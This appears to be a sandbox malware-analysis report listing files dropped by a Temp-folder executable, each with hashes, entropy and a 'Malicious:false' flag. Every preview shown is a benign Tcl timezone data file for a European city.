                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Sofia) {. {-9223372036854775808 5596 0 LMT}. {-2840146396 7016 0 IMT}. {-2369527016 7200 0 EET}. {-857257200 3600 0 CET}. {-844556400 7200 1 CEST}. {-828226800 3600 0 CET}. {-812502000 7200 1 CEST}. {-796777200 3600 0 CET}. {-788922000 3600 0 CET}. {-781048800 7200 0 EET}. {291762000 10800 0 EEST}. {307576800 7200 0 EET}. {323816400 10800 1 EEST}. {339026400 7200 0 EET}. {355266000 10800 1 EEST}. {370393200 7200 0 EET}. {386715600 10800 1 EEST}. {401846400 7200 0 EET}. {417571200 10800 1 EEST}. {433296000 7200 0 EET}. {449020800 10800 1 EEST}. {465350400 7200 0 EET}. {481075200 10800 1 EEST}. {496800000 7200 0 EET}. {512524800 10800 1 EEST}. {528249600 7200 0 EET}. {543974400 10800 1 EEST}. {559699200 7200 0 EET}. {575424000 10800 1 EEST}. {591148800 7200 0 EET}. {606873600 10800 1 EEST}. {622598400 7200 0 EET}. {638323200 10
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):7058
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.730067397634837
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:K39ucRbjOP9/V+H4Mnb4Nkrloy4xBqffZRgKs0AzxAHTdIVaAq0VZQltUbAyzF76:K3HRNH4Mn82rlo6XIZ9ALeBO
                                                                                                                                                                                                                                                                                                                                MD5:7F6C45358FC5E91125ACBDD46BBD93FE
                                                                                                                                                                                                                                                                                                                                SHA1:C07A80D3C136679751D64866B725CC390D73B750
                                                                                                                                                                                                                                                                                                                                SHA-256:119E9F7B1284462EB8E920E7216D1C219B09A73B323796BBF843346ECD71309A
                                                                                                                                                                                                                                                                                                                                SHA-512:585AE0B1DE1F5D31E45972169C831D837C19D05E21F65FAD3CB84BEF8270C31BF2F635FB803CB70C569FAC2C8AA6ABDE057943F4B51BF1D73B72695FE95ECFD2
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Stockholm) {. {-9223372036854775808 4332 0 LMT}. {-2871681132 3614 0 SET}. {-2208992414 3600 0 CET}. {-1692496800 7200 1 CEST}. {-1680483600 3600 0 CET}. {315529200 3600 0 CET}. {323830800 7200 1 CEST}. {338950800 3600 0 CET}. {354675600 7200 1 CEST}. {370400400 3600 0 CET}. {386125200 7200 1 CEST}. {401850000 3600 0 CET}. {417574800 7200 1 CEST}. {433299600 3600 0 CET}. {449024400 7200 1 CEST}. {465354000 3600 0 CET}. {481078800 7200 1 CEST}. {496803600 3600 0 CET}. {512528400 7200 1 CEST}. {528253200 3600 0 CET}. {543978000 7200 1 CEST}. {559702800 3600 0 CET}. {575427600 7200 1 CEST}. {591152400 3600 0 CET}. {606877200 7200 1 CEST}. {622602000 3600 0 CET}. {638326800 7200 1 CEST}. {654656400 3600 0 CET}. {670381200 7200 1 CEST}. {686106000 3600 0 CET}. {701830800 7200 1 CEST}. {717555600 3600 0 CET}. {733280400 7200 1 CEST
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):7295
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.6772204206246193
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:dcqDyurGXl6V/DraKl9sUM2kNU4tztagAwkY5V778e27zo2yiQ6kjmyykeP2lwtk:e7GG16gh2kNU4tB715pyzHy1gA
                                                                                                                                                                                                                                                                                                                                MD5:981078CAEAA994DD0C088B8C4255018A
                                                                                                                                                                                                                                                                                                                                SHA1:5B5E542491FCCC80B04F6F3CA3BA76FEE35BC207
                                                                                                                                                                                                                                                                                                                                SHA-256:716CFFE58847E0084C904A01EF4230F63275660691A4BA54D0B80654E215CC8F
                                                                                                                                                                                                                                                                                                                                SHA-512:3010639D28C7363D0B787F84EF57EE30F457BD8A6A64AEDED1E813EB1AF0A8D85DA0A788C810509F932867F7361B338753CC9B79ACA95D2D32A77F7A8AA8BC9F
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Tallinn) {. {-9223372036854775808 5940 0 LMT}. {-2840146740 5940 0 TMT}. {-1638322740 3600 0 CET}. {-1632006000 7200 1 CEST}. {-1618700400 3600 0 CET}. {-1593824400 5940 0 TMT}. {-1535938740 7200 0 EET}. {-927943200 10800 0 MSK}. {-892954800 3600 0 CET}. {-857257200 3600 0 CET}. {-844556400 7200 1 CEST}. {-828226800 3600 0 CET}. {-812502000 7200 1 CEST}. {-797648400 10800 0 MSD}. {354920400 14400 1 MSD}. {370728000 10800 0 MSK}. {386456400 14400 1 MSD}. {402264000 10800 0 MSK}. {417992400 14400 1 MSD}. {433800000 10800 0 MSK}. {449614800 14400 1 MSD}. {465346800 10800 0 MSK}. {481071600 14400 1 MSD}. {496796400 10800 0 MSK}. {512521200 14400 1 MSD}. {528246000 10800 0 MSK}. {543970800 14400 1 MSD}. {559695600 10800 0 MSK}. {575420400 14400 1 MSD}. {591145200 10800 0 MSK}. {606870000 10800 1 EEST}. {622598400 7200 0 EET}. {638
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):7412
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.7216700074911437
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:6t1WXXRM8DAdRbjOP9/V+H4Mnb4Nkrloy4xBqffZRgKs0AzxAHTdIVaAq0VZQlth:6GXh9AdRNH4Mn82rlo6XIZ9ALeBO
                                                                                                                                                                                                                                                                                                                                MD5:872AB00046280F53657A47D41FBA5EFE
                                                                                                                                                                                                                                                                                                                                SHA1:311BF2342808BD9DC8AB2C2856A1F91F50CFB740
                                                                                                                                                                                                                                                                                                                                SHA-256:D02C2CD894AE4D3C2619A4249088A566B02517FA3BF65DEFAF4280C407E5B5B3
                                                                                                                                                                                                                                                                                                                                SHA-512:2FF901990FA8D6713D875F90FE611E54B35A2216C380E88D408C4FB5BD06916EE804DC6331C117C3AC643731BEADB5BDEDEA0F963B89FAEDB07CA3FFD0B3A535
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Tirane) {. {-9223372036854775808 4760 0 LMT}. {-1767230360 3600 0 CET}. {-932346000 7200 0 CEST}. {-857257200 3600 0 CET}. {-844556400 7200 1 CEST}. {-843519600 3600 0 CET}. {136854000 7200 1 CEST}. {149896800 3600 0 CET}. {168130800 7200 1 CEST}. {181432800 3600 0 CET}. {199839600 7200 1 CEST}. {213141600 3600 0 CET}. {231894000 7200 1 CEST}. {244591200 3600 0 CET}. {263257200 7200 1 CEST}. {276040800 3600 0 CET}. {294706800 7200 1 CEST}. {307490400 3600 0 CET}. {326156400 7200 1 CEST}. {339458400 3600 0 CET}. {357087600 7200 1 CEST}. {370389600 3600 0 CET}. {389142000 7200 1 CEST}. {402444000 3600 0 CET}. {419468400 7200 1 CEST}. {433807200 3600 0 CET}. {449622000 7200 1 CEST}. {457480800 7200 0 CEST}. {465354000 3600 0 CET}. {481078800 7200 1 CEST}. {496803600 3600 0 CET}. {512528400 7200 1 CEST}. {528253200 3600 0 CET}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):184
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.85845283098493
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqxV+NM/LpVAIgoq9NM/eO6yQa3MPgJM1p8QagNM/cn:SlSWB9IZaM3ymI6NVAIgoI6eFytM4M8g
                                                                                                                                                                                                                                                                                                                                MD5:743453106E8CD7AE48A2F575255AF700
                                                                                                                                                                                                                                                                                                                                SHA1:7CD6F6DCA61792B4B2CBF6645967B9349ECEACBE
                                                                                                                                                                                                                                                                                                                                SHA-256:C28078D4B42223871B7E1EB42EEB4E70EA0FED638288E9FDA5BB5F954D403AFB
                                                                                                                                                                                                                                                                                                                                SHA-512:458072C7660BEAFEB9AE5A2D3AEA6DA582574D80193C89F08A57B17033126E28A175F5B6E2990034660CAE3BC1E837F8312BC4AA365F426BD54588D0C5A12EB8
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/Chisinau)]} {. LoadTimeZoneFile Europe/Chisinau.}.set TZData(:Europe/Tiraspol) $TZData(:Europe/Chisinau).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2046
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.588329521363201
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:cUeRgjS+OVkb/cXODnOwUDOS5u8OimFeb/ROHc9qOYNkw/O2blbEUhtCUHiWn0it:EWDTZVemFLN7NBx3Bnu3+ix6b0JiGef
                                                                                                                                                                                                                                                                                                                                MD5:E4394950F7838CD984172D68DA413486
                                                                                                                                                                                                                                                                                                                                SHA1:75F84A4C887463DE3F82C7F0339DD7D71871AA65
                                                                                                                                                                                                                                                                                                                                SHA-256:CB780BBC06F9268CE126461AF9B6539FF16964767A8763479099982214280896
                                                                                                                                                                                                                                                                                                                                SHA-512:7D0E3904300FDD3C4814E15A3C042F3E641BF56AF6867DA7580D1DAD8E07F5B4F0C0717A34E8336C0908D760EDCD48605C7B6BA06A5165BD2BD3AF0B68399C59
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Ulyanovsk) {. {-9223372036854775808 11616 0 LMT}. {-1593820800 10800 0 +03}. {-1247540400 14400 0 +05}. {354916800 18000 1 +05}. {370724400 14400 0 +04}. {386452800 18000 1 +05}. {402260400 14400 0 +04}. {417988800 18000 1 +05}. {433796400 14400 0 +04}. {449611200 18000 1 +05}. {465343200 14400 0 +04}. {481068000 18000 1 +05}. {496792800 14400 0 +04}. {512517600 18000 1 +05}. {528242400 14400 0 +04}. {543967200 18000 1 +05}. {559692000 14400 0 +04}. {575416800 18000 1 +05}. {591141600 14400 0 +04}. {606866400 10800 0 +04}. {606870000 14400 1 +04}. {622594800 10800 0 +03}. {638319600 14400 1 +04}. {654649200 10800 0 +03}. {670374000 7200 0 +03}. {670377600 10800 1 +03}. {686102400 7200 0 +02}. {695779200 10800 0 +04}. {701823600 14400 1 +04}. {717548400 10800 0 +03}. {733273200 14400 1 +04}. {748998000 10800 0 +03}. {764722800
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):7287
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.681086026612126
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:DptgbYyurZiVaKl9sUM2kNU4tztagAwkY5V778e27zo2yiQ6kjmyykeP2lwtOEZ2:Dp4GZNh2kNU4tB715pyzHy1gA
                                                                                                                                                                                                                                                                                                                                MD5:E1088083B0D5570AF8FBE54A4C553AFB
                                                                                                                                                                                                                                                                                                                                SHA1:A6EC8636A0092737829B873C4879E9D4C1B0A288
                                                                                                                                                                                                                                                                                                                                SHA-256:19D87DB3DAB942037935FEC0A9A5E5FE24AFEB1E5F0F1922AF2AF2C2E186621D
                                                                                                                                                                                                                                                                                                                                SHA-512:C58AA37111AE29F85C9C3F1E52DB3C9B2E2DCEFBBB9ACA4C61AD9B00AA7F3A436E754D2285774E882614B16D5DB497ED370A06EE1AFC513579E1E5F1475CA160
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Uzhgorod) {. {-9223372036854775808 5352 0 LMT}. {-2500939752 3600 0 CET}. {-946774800 3600 0 CET}. {-938905200 7200 1 CEST}. {-857257200 3600 0 CET}. {-844556400 7200 1 CEST}. {-828226800 3600 0 CET}. {-812502000 7200 1 CEST}. {-796870800 7200 1 CEST}. {-794714400 3600 0 CET}. {-773456400 10800 0 MSD}. {354920400 14400 1 MSD}. {370728000 10800 0 MSK}. {386456400 14400 1 MSD}. {402264000 10800 0 MSK}. {417992400 14400 1 MSD}. {433800000 10800 0 MSK}. {449614800 14400 1 MSD}. {465346800 10800 0 MSK}. {481071600 14400 1 MSD}. {496796400 10800 0 MSK}. {512521200 14400 1 MSD}. {528246000 10800 0 MSK}. {543970800 14400 1 MSD}. {559695600 10800 0 MSK}. {575420400 14400 1 MSD}. {591145200 10800 0 MSK}. {606870000 14400 1 MSD}. {622594800 10800 0 MSK}. {631141200 10800 0 MSK}. {646786800 3600 0 CET}. {670384800 7200 0 EET}. {694216800
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):175
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.906311228352029
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqxVnCMPwVAIgoqkCMJW6yQa1NEHp8Qa5CMP:SlSWB9IZaM3ym5XwVAIgo5PyvNEJ8jH
                                                                                                                                                                                                                                                                                                                                MD5:C1817BA53C7CD6BF007A7D1E17FBDFF1
                                                                                                                                                                                                                                                                                                                                SHA1:C72DCD724E24BBE7C22F9279B05EE03924603348
                                                                                                                                                                                                                                                                                                                                SHA-256:E000C8E2A27AE8494DC462D486DC28DAFA502F644FC1540B7B6050EABE4712DC
                                                                                                                                                                                                                                                                                                                                SHA-512:E48C1E1E60233CEC648004B6441F4A49D18D07904F88670A6F9A3DACC3006F7D7CE4A9ACB6C9B6DB8F45CB324EA1BCF6CC3DA8C1FFB40A948BB2231AC4B57EEB
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/Zurich)]} {. LoadTimeZoneFile Europe/Zurich.}.set TZData(:Europe/Vaduz) $TZData(:Europe/Zurich).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):171
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.8663121336740405
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqxVvjFwFVAIgoqsuCHRLyQa1xLM1p8Qax9:SlSWB9IZaM3ymx5wFVAIgoxuCxLyvN+a
                                                                                                                                                                                                                                                                                                                                MD5:0652C9CF19CCF5C8210330B22F200D47
                                                                                                                                                                                                                                                                                                                                SHA1:052121E14825CDF98422CAA2CDD20184F184A446
                                                                                                                                                                                                                                                                                                                                SHA-256:3BC0656B5B52E3C3C6B7BC5A53F9228AAFA3EB867982CFD9332B7988687D310B
                                                                                                                                                                                                                                                                                                                                SHA-512:1880524DCA926F4BFD1972E53D5FE616DE18E4A29E9796ABEAEE4D7CD10C6FE79C0D731B305BD4DAA6FC3917B286543D622F2291B76DABA231B9B22A784C7475
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/Rome)]} {. LoadTimeZoneFile Europe/Rome.}.set TZData(:Europe/Vatican) $TZData(:Europe/Rome).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):7659
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.7322931990772257
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:2ntWj6DmcRbjOP9/V+H4Mnb4Nkrloy4xBqffZRgKs0AzxAHTdIVaAq0VZQltUbAT:2tWURNH4Mn82rlo6XIZ9ALeBO
                                                                                                                                                                                                                                                                                                                                MD5:E8D0D78179D1E9D738CEEC1D0D4943E5
                                                                                                                                                                                                                                                                                                                                SHA1:E0469B86F545FFFA81CE9694C96FE30F33F745DD
                                                                                                                                                                                                                                                                                                                                SHA-256:44FF42A100EA0EB448C3C00C375F1A53614B0B5D468ADF46F2E5EAFF44F7A64C
                                                                                                                                                                                                                                                                                                                                SHA-512:FACA076F44A64211400910E4A7CAD475DD24745ECCE2FE608DD47B0D5BB9221FF15B9D58A767A90FF8D25E0545C3E50B3E464FF80B1D23E934489420640F5C8A
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Vienna) {. {-9223372036854775808 3921 0 LMT}. {-2422055121 3600 0 CET}. {-1693706400 7200 1 CEST}. {-1680483600 3600 0 CET}. {-1663455600 7200 1 CEST}. {-1650150000 3600 0 CET}. {-1632006000 7200 1 CEST}. {-1618700400 3600 0 CET}. {-1577926800 3600 0 CET}. {-1569711600 7200 1 CEST}. {-1555801200 3600 0 CET}. {-938905200 7200 0 CEST}. {-857257200 3600 0 CET}. {-844556400 7200 1 CEST}. {-828226800 3600 0 CET}. {-812502000 7200 1 CEST}. {-796777200 3600 0 CET}. {-781052400 7200 1 CEST}. {-780188400 3600 0 CET}. {-757386000 3600 0 CET}. {-748479600 7200 1 CEST}. {-733359600 3600 0 CET}. {-717634800 7200 1 CEST}. {-701910000 3600 0 CET}. {-684975600 7200 1 CEST}. {-670460400 3600 0 CET}. {323823600 7200 1 CEST}. {338940000 3600 0 CET}. {347151600 3600 0 CET}. {354675600 7200 1 CEST}. {370400400 3600 0 CET}. {386125200 7200 1 CEST}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):7233
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.682695131194103
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:/FsyurvxXl6V/DAOLl9sUM2kNU4tztagAwkY5V778e27zo2yiQ6kjmyykeP2lwtk:/fGJ16Oh2kNU4tB715pyzHy1gA
                                                                                                                                                                                                                                                                                                                                MD5:CF7967CD882413C1423CCD5A1EDC8B2E
                                                                                                                                                                                                                                                                                                                                SHA1:72F5F5D280530A67591FC0F88BF272E2975E173C
                                                                                                                                                                                                                                                                                                                                SHA-256:1E13055C7BF8D7469AFC28B0ED91171D203B382B62F78D140C1CB12CF968637C
                                                                                                                                                                                                                                                                                                                                SHA-512:777B7418FFB8DFE4E6A2B1057BB3CFF2358269044F0E5887260663790D0344BDFD8BF5C220987E30B2D8D391BB96C17C8C5EE86DA83EC4874F7EC3172477DFB6
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Vilnius) {. {-9223372036854775808 6076 0 LMT}. {-2840146876 5040 0 WMT}. {-1672536240 5736 0 KMT}. {-1585100136 3600 0 CET}. {-1561251600 7200 0 EET}. {-1553565600 3600 0 CET}. {-928198800 10800 0 MSK}. {-900126000 3600 0 CET}. {-857257200 3600 0 CET}. {-844556400 7200 1 CEST}. {-828226800 3600 0 CET}. {-812502000 7200 1 CEST}. {-802141200 10800 0 MSD}. {354920400 14400 1 MSD}. {370728000 10800 0 MSK}. {386456400 14400 1 MSD}. {402264000 10800 0 MSK}. {417992400 14400 1 MSD}. {433800000 10800 0 MSK}. {449614800 14400 1 MSD}. {465346800 10800 0 MSK}. {481071600 14400 1 MSD}. {496796400 10800 0 MSK}. {512521200 14400 1 MSD}. {528246000 10800 0 MSK}. {543970800 14400 1 MSD}. {559695600 10800 0 MSK}. {575420400 14400 1 MSD}. {591145200 10800 0 MSK}. {606870000 7200 0 EEMMTT}. {606873600 10800 1 EEST}. {622598400 7200 0 EET}. {638
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2021
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.5806689351967527
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:cRecrebjS+OVkb/cXODnOwUDOS5u8OimFeb/ROHc9qOYNkwLUk+EUhtCUH9mUBUv:YenDTZVemFLN70333+ix6b0JiGE
                                                                                                                                                                                                                                                                                                                                MD5:DFC3D37284F1DCFE802539DB1E684399
                                                                                                                                                                                                                                                                                                                                SHA1:67778FFE4326B1391C3CFE991B3C84C1E9ACA2D2
                                                                                                                                                                                                                                                                                                                                SHA-256:AAFA26F7ED5733A2E45E77D67D7E4E521918CBDC19DAB5BA7774C60B9FDC203F
                                                                                                                                                                                                                                                                                                                                SHA-512:B5A63E363CF9814C6E530840D9BB5A78C36493BAD54060781BACDF10DFA8C95988081DE3364E56D3FDFDBB5A6489E549D8CB1C0B5D1C57F53A1B1915B291A0D9
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Volgograd) {. {-9223372036854775808 10660 0 LMT}. {-1577761060 10800 0 +03}. {-1247540400 14400 0 +04}. {-256881600 14400 0 +05}. {354916800 18000 1 +05}. {370724400 14400 0 +04}. {386452800 18000 1 +05}. {402260400 14400 0 +04}. {417988800 18000 1 +05}. {433796400 14400 0 +04}. {449611200 18000 1 +05}. {465343200 14400 0 +04}. {481068000 18000 1 +05}. {496792800 14400 0 +04}. {512517600 18000 1 +05}. {528242400 14400 0 +04}. {543967200 18000 1 +05}. {559692000 14400 0 +04}. {575416800 10800 0 +04}. {575420400 14400 1 +04}. {591145200 10800 0 +03}. {606870000 14400 1 +04}. {622594800 10800 0 +03}. {638319600 14400 1 +04}. {654649200 10800 0 +03}. {670374000 14400 0 +04}. {701820000 10800 0 +04}. {701823600 14400 1 +04}. {717548400 10800 0 +03}. {733273200 14400 1 +04}. {748998000 10800 0 +03}. {764722800 14400 1 +04}. {780447
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):8366
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.731361496484662
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:uOZMLerhW4v4Qzh3VEbjOP9/V+H4Mnb4Nkrloy4xBqffZRgKs0AzxAHTdIVaAq0c:uArhW4v4yENH4Mn82rlo6XIZ9ALeBO
                                                                                                                                                                                                                                                                                                                                MD5:5F72F26A78BECD6702560DE8C7CCB850
                                                                                                                                                                                                                                                                                                                                SHA1:A14E10DCC128B88B3E9C5D2A86DAC7D254CEB123
                                                                                                                                                                                                                                                                                                                                SHA-256:054C1CDABAD91C624A4007D7594C30BE96906D5F29B54C292E0B721F8CB03830
                                                                                                                                                                                                                                                                                                                                SHA-512:564A575EA2FBDB1D262CF55D55BEFC0BF6EF2081D88DE25712B742F5800D2FBE155EDEF0303F62D497BA0E849174F235D8599E09E1C997789E24FE5583F4B0FC
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Warsaw) {. {-9223372036854775808 5040 0 LMT}. {-2840145840 5040 0 WMT}. {-1717032240 3600 0 CET}. {-1693706400 7200 1 CEST}. {-1680483600 3600 0 CET}. {-1663455600 7200 1 CEST}. {-1650150000 3600 0 CET}. {-1632006000 7200 1 CEST}. {-1618696800 7200 0 EET}. {-1600473600 10800 1 EEST}. {-1587168000 7200 0 EET}. {-931734000 7200 0 CEST}. {-857257200 3600 0 CET}. {-844556400 7200 1 CEST}. {-828226800 3600 0 CET}. {-812502000 7200 1 CEST}. {-796870800 7200 0 CEST}. {-796608000 3600 0 CET}. {-778726800 7200 1 CEST}. {-762660000 3600 0 CET}. {-748486800 7200 1 CEST}. {-733273200 3600 0 CET}. {-715215600 7200 1 CEST}. {-701910000 3600 0 CET}. {-684975600 7200 1 CEST}. {-670460400 3600 0 CET}. {-654130800 7200 1 CEST}. {-639010800 3600 0 CET}. {-397094400 7200 1 CEST}. {-386812800 3600 0 CET}. {-371088000 7200 1 CEST}. {-355363200 3600 0
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):182
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.851218990240677
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqxV/sUE2tvFVAIgoq8sUE2vqLyQa5rXv1/h8QahsUE2u:SlSWB9IZaM3ymhrE2tvFVAIgohrE2vqK
                                                                                                                                                                                                                                                                                                                                MD5:445F589A26E47F9D7BDF1A403A96108E
                                                                                                                                                                                                                                                                                                                                SHA1:B119D93796DA7C793F9ED8C5BB8BB65C8DDBFC81
                                                                                                                                                                                                                                                                                                                                SHA-256:6E3ED84BC34D90950D267230661C2EC3C32BA190BD57DDC255F4BE901678B208
                                                                                                                                                                                                                                                                                                                                SHA-512:F45AF9AC0AF800FDCC74DBED1BDFA106A6A58A15308B5B62B4CB6B091FCFD321F156618BE2C157A1A6CAFAAAC399E4C6B590AF7CE7176F757403B55F09842FD2
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/Belgrade)]} {. LoadTimeZoneFile Europe/Belgrade.}.set TZData(:Europe/Zagreb) $TZData(:Europe/Belgrade).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):7238
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.6787190163584103
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:Tnh2yurpr2nVaKl9sUM2kNU4tztagAwkY5V778e27zo2yiQ6kjmyykeP2lwtOEZ2:T1Gt2ch2kNU4tB715pyzHy1gA
                                                                                                                                                                                                                                                                                                                                MD5:4AC1F6AB26F3869C757247346BCB72B5
                                                                                                                                                                                                                                                                                                                                SHA1:CB0880906DC630F3C2B934998853CD05AAA1FE39
                                                                                                                                                                                                                                                                                                                                SHA-256:3E9F843F5C6DDBE8E6431BE28ACB95507DDDCA6C521E2FD3355A103BF38F3CB7
                                                                                                                                                                                                                                                                                                                                SHA-512:C4A3AB7B5BA3BC371285654159CB1767ECD52DEDAA61BF69586F6ED61F9F1E877796C28438FF582962C12780484214B5EA670654C87240E01EDD2A4B271EDEEF
                                                                                                                                                                                                                                                                                                                                Malicious:false
